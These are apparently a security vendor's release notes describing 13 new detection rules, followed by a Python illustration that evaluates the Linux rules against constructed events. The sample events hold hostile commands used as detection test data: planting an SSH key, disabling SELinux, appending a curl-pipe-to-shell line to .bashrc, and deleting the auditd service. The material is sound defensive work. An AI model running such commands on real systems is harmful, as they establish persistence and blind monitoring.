Release 8 - Out-of-the-box alerts
Our October release brings more alerts across various technologies: a total of 13 new out-of-the-box detections covering Linux, Windows, Mimecast, and Google Workspace. In upcoming releases we will also take a closer look at some of our noisier alerts and tune them to improve their precision and performance.
Devo is committed to providing high-quality alerts for all customer environments, and we will continue to deliver out-of-the-box detections in the next release. That release will focus on improving the existing alerts, and we will keep expanding the library with new technologies and coverage of additional MITRE ATT&CK tactics.
Alert analyzed/updated:

| Detection name | Changes made |
|---|---|
| SecOpsFWSMBTrafficOutbound | Updated to the newest alert template so that it installs cleanly through SecOps Content Manager |
Details of the new detections released are below:

| Detection name | Detection description | Devo table/Data source/Category |
|---|---|---|
| SecOpsLinuxSshAuthKeyModification | Detects modifications to the SSH authorized_keys file, which lists the public keys permitted to log in to the server; adding a key there is a common persistence technique. | box.unix |
| SecOpsLinuxPotentialDisableSELinux | Detects a potential attempt to disable Security-Enhanced Linux (SELinux). | box.unix |
| SecOpsLinuxIntNetworkviaTelnet | Detects connections to internal hosts via Telnet, a cleartext protocol. | box.unix |
| SecOpsLinuxExtNetworkviaTelnet | Detects connections to external hosts via Telnet. | box.unix |
| SecOpsLinuxSvcFileCreated | Detects suspicious file creation in systemd unit directories, which can be used to establish persistence as a service. | box.unix |
| SecOpsLinuxAppendCommandToProfileConfig | Detects command lines that append commands to user profile or shell configuration files so that they run at the next login. | box.unix |
| SecOpsLinuxHighFileDeletesEtc | Detects a high number of file deletions within a short time window. | box.unix |
| SecOpsLinuxFileCreateInitBoot | Detects file creation in init system directories; files placed there can be executed at machine boot. | box.unix |
| SecOpsLinuxDeletionofService | Detects deletion of services on a Linux machine. | box.unix |
| SecOpsWinGoldenSamlCertificateExport | Detects potential export of a certificate that could be used to forge SAML tokens (Golden SAML) and bypass authentication. | box.all.win |
| SecOpsMimecastMessageWithHighSpamScore | Flags received messages to which Mimecast assigned a high spam score. Adversaries may send spearphishing emails with malicious attachments in an attempt to gain access to victim systems. | mail.mimecast.siem.receipt |
| SecOpsMimecastMessageWithVirusDetections | Flags messages on which Mimecast's anti-virus scanning reported a detection. Adversaries may send spearphishing emails with malicious attachments in an attempt to gain access to victim systems. | mail.mimecast.siem.av |
| SecOpsGSuiteDriveSuspiciousSharedFileName | Flags Google Drive files shared under suspicious file names. Adversaries may send spearphishing emails with malicious attachments or share malicious files via cloud storage services in an attempt to gain access to victim systems. | cloud.gsuite.reports.drive |
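The Linux rows above state what each rule looks for but not how the condition is evaluated. The Python block below is an added illustration, not Devo's rule code (Devo rules are queries over box.unix, whose schema is not reproduced here): it implements the same conditions over constructed shell/audit-style events. The Event fields, the systemd/init/profile path lists, the RFC 1918 definition of "internal", the 60-second/10-deletion window for the high-delete rule, and every sample record are assumptions made for this example.

```python
"""Toy re-implementation of the Linux rules listed above, run over constructed
events. Added illustration; not Devo's rule logic or the box.unix schema."""
import ipaddress
import re
from collections import defaultdict, deque
from dataclasses import dataclass


@dataclass
class Event:
    ts: float         # seconds (constructed; not a real timestamp format)
    user: str
    cmd: str          # command line recorded by the shell/audit source
    path: str = ""    # file the command touched, when the source records it
    action: str = ""  # "create", "modify" or "delete" when path is set


# Assumed path lists; a real rule would use whatever the deployment treats as authoritative.
SYSTEMD_DIRS = ("/etc/systemd/system/", "/usr/lib/systemd/system/",
                "/lib/systemd/system/", "/run/systemd/system/")
INIT_BOOT_DIRS = ("/etc/init.d/", "/etc/rc.d/", "/etc/init/", "/etc/rc.local")
PROFILE_SUFFIXES = (".bashrc", ".bash_profile", ".profile", "/etc/profile", "/etc/bash.bashrc")
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

RE_SELINUX_OFF = re.compile(r"\bsetenforce\s+0\b|SELINUX=(disabled|permissive)")
RE_TELNET = re.compile(r"\btelnet\s+(\S+)")
RE_APPEND = re.compile(r">>\s*(\S+)")


def _in_dirs(path, dirs):
    return any(path.startswith(d) for d in dirs)


def _is_profile(path):
    return path.endswith(PROFILE_SUFFIXES) or path.startswith("/etc/profile.d/")


def evaluate(ev):
    """Names of the single-event rules that fire for ev, in table order."""
    hits = []
    if ev.action in ("create", "modify") and ev.path.endswith("/.ssh/authorized_keys"):
        hits.append("SecOpsLinuxSshAuthKeyModification")
    if RE_SELINUX_OFF.search(ev.cmd):
        hits.append("SecOpsLinuxPotentialDisableSELinux")
    m = RE_TELNET.search(ev.cmd)
    if m:
        try:
            addr = ipaddress.ip_address(m.group(1))
        except ValueError:
            addr = None  # hostname target: not classified without resolution
        if addr is not None:
            internal = any(addr in net for net in RFC1918)
            hits.append("SecOpsLinuxIntNetworkviaTelnet" if internal
                        else "SecOpsLinuxExtNetworkviaTelnet")
    if ev.action == "create" and _in_dirs(ev.path, SYSTEMD_DIRS):
        hits.append("SecOpsLinuxSvcFileCreated")
    m = RE_APPEND.search(ev.cmd)
    if (m and _is_profile(m.group(1))) or (ev.action == "modify" and _is_profile(ev.path)):
        hits.append("SecOpsLinuxAppendCommandToProfileConfig")
    if ev.action == "create" and _in_dirs(ev.path, INIT_BOOT_DIRS):
        hits.append("SecOpsLinuxFileCreateInitBoot")
    if ev.action == "delete" and ev.path.endswith(".service") and _in_dirs(ev.path, SYSTEMD_DIRS):
        hits.append("SecOpsLinuxDeletionofService")
    return hits


def high_delete_users(events, window=60.0, threshold=10):
    """SecOpsLinuxHighFileDeletesEtc analogue: users with >= threshold deletions
    inside any sliding window of `window` seconds (the only stateful rule here)."""
    recent = defaultdict(deque)
    flagged = set()
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.action != "delete":
            continue
        q = recent[ev.user]
        q.append(ev.ts)
        while ev.ts - q[0] > window:   # drop deletions older than the window
            q.popleft()
        if len(q) >= threshold:
            flagged.add(ev.user)
    return flagged


# Constructed sample events; none of these are real log records.
SAMPLE_EVENTS = [
    Event(1.0, "svc", "echo 'ssh-ed25519 AAAAC3... attacker' >> /home/svc/.ssh/authorized_keys",
          "/home/svc/.ssh/authorized_keys", "modify"),
    Event(2.0, "root", "setenforce 0"),
    Event(3.0, "root", "sed -i 's/SELINUX=enforcing/SELINUX=disabled/' /etc/selinux/config",
          "/etc/selinux/config", "modify"),
    Event(4.0, "dev", "telnet 10.0.0.5 23"),
    Event(5.0, "dev", "telnet 203.0.113.9"),
    Event(6.0, "root", "cp /tmp/x.service /etc/systemd/system/x.service",
          "/etc/systemd/system/x.service", "create"),
    Event(7.0, "dev", "echo 'curl http://example.invalid/a.sh | sh' >> ~/.bashrc"),
    Event(8.0, "root", "touch /etc/init.d/backdoor", "/etc/init.d/backdoor", "create"),
    Event(9.0, "root", "rm /etc/systemd/system/auditd.service",
          "/etc/systemd/system/auditd.service", "delete"),
    Event(30.0, "dev", "ls -la"),
] + [Event(10.0 + 0.1 * i, "cleaner", f"rm /etc/cron.d/job{i}", f"/etc/cron.d/job{i}", "delete")
     for i in range(12)]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        for rule in evaluate(ev):
            print(f"{ev.ts:5.1f} {ev.user:8} {rule}")
    print("high-frequency deleters:", high_delete_users(SAMPLE_EVENTS))
```

Two points the table cannot show: the Telnet rules depend on a definition of "internal" (here RFC 1918, an assumption), and a hostname target cannot be classified at all without resolution, so it produces no alert in this example; and the high-delete rule is the only one that needs state across events, which is also why it is the kind of rule most likely to need threshold tuning per environment.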